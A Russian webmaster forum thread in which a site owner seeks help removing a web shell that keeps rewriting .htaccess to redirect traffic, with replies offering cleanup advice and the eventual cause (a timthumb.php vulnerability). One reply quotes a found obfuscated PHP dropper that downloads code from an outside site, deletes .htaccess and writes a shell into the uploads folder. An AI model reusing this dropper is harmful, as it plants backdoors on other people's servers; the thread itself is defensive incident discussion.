- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Залили шелл на пару сайтов, один - Livestreet, другой DLE, так же нагуглил у людей та же история но с Wordpress (обсуждение).
Суть в чем: каждый ~10 минут изменяется htaccess, ставяться права 444, и сливается трафик.
Пробовал: Давал владельца root htaccess, если через пользователя идут действия, но владелец меняется обратно на пользователя и в htaccess добавляются строки.
Как отловить какой скрипт изменяет htaccess?
Кто может помочь, пишите в личку
rewiaca может обратитесь в саппорт хостинга, чтоб просканирвоали файлы ваших сайтов на вирусы.
rewiaca может обратитесь в саппорт хостинга, чтоб просканирвоали файлы ваших сайтов на вирусы.
Шелл не спалится антивирусной проверкой.
ТС, как вариант - просмотрите файлы по дате изменения, найдите свежие.
А оптимально - переустановите движок, правильно расставив права и поставив владельца, чтобы нельзя было изменить файлы и права.
У меня подозрение что шелл не лежит на самом каталоге домена, но я проверю, надо запретить выполнение всех php скриптов в htaccess, и если он всеравно измениться то точно не в /www/
RemoveHandler php-script .php .php3 .php4 .php5 .php6 .phtml .phps .phpt .png .jpeg .jpg .gif
AddType application/x-httpd-php-source .php .php3 .php4 .php5 .php6 .phtml .phps .phpt .png .jpeg .jpg .gif
Только если там не такое расширение исполняемого скрипта?
Хостинг hostlife, говорят: "найдите вебместера квалифицированного"
Что-то мне подсказывает, что у Вас апач под рутом работает, или у хацкеров есть рут-доступ.
Обычно дату меняют (если хостер не запретил или прав хватает - touch).
Очень часто ломают хостера. Поэтому в первую очередь вопросы хостеру.
А там - либо съезжайте, либо сами мониторте и заменяйте обратно. Но только зачем?
У меня подозрение что шелл не лежит на самом каталоге домена, но я проверю, надо запретить выполнение всех php скриптов в htaccess, и если он всеравно измениться то точно не в /www/
AddType application/x-httpd-php-source .php .php3 .php4 .php5 .php6 .phtml .phps .phpt .png .jpeg .jpg .gif
Только если там не такое расширение исполняемого скрипта?
Хостинг hostlife, говорят: "найдите вебместера квалифицированного"
Не помогло, даже при:
к htaccess добавляются строки редиректов. Значит ли это что шелл лежит в системных файлах? Можно ли отловить какой скрипт обращается к htaccess?
У меня подобное было. В одном из файле было вот что
$f = file_get_contents('h'.'t'.'t'.'p'.':'.'//'.'s'.'c'.'a'.'r'.'y'.'f'.'i'.'l'.'m'.'.'.'ru'.'/get.'.'p'.'hp'.'?url='.$_SERVER['HTTP_HOST']).unlink(ROOT_DIR.'/'.'u'.'p'.'l'.'o'.'a'.'d'.'s'.'/.htaccess');
file_put_contents(ROOT_DIR.'/'.'u'.'p'.'l'.'o'.'a'.'d'.'s'.'/'.'f'.'ot'.'os'.'/pe'.'op'.'le'.'.p'.'hp', str_replace('fghfgh544ty', '?>', str_replace('fgfvsdffvsdvsd', '<?', $f)));
После выполнения удалялся автоматом .htaccess и снова заливался шелл🙅
Ох, с утра сижу, борюсь.
В общем оцените идею: переношу каждый сайт на отдельного пользователя в ISP, чищу htaccess и он больше не меняется. Процедура довольно геморная но что делать..
Думаю что так можно выявить сайт на котором стоит шел, меняющий htaccess на всех файлах, и удалить его.
Была уязвимость timthumb.php в Wordpress, через него был загружен hack.zip. Нашел сайт через который все было проделано, вычислил и все нормализовалось. Спасибо человеку, который откликнуля и написал в личку - Samvel, /ru/users/74883
Шеел в последнее время очень качественно вставляют в сами иполняемые файлы, в любом случае есть был шелл нуно искать на всех сайта вашего хоста!
Если нужна помощь стучите!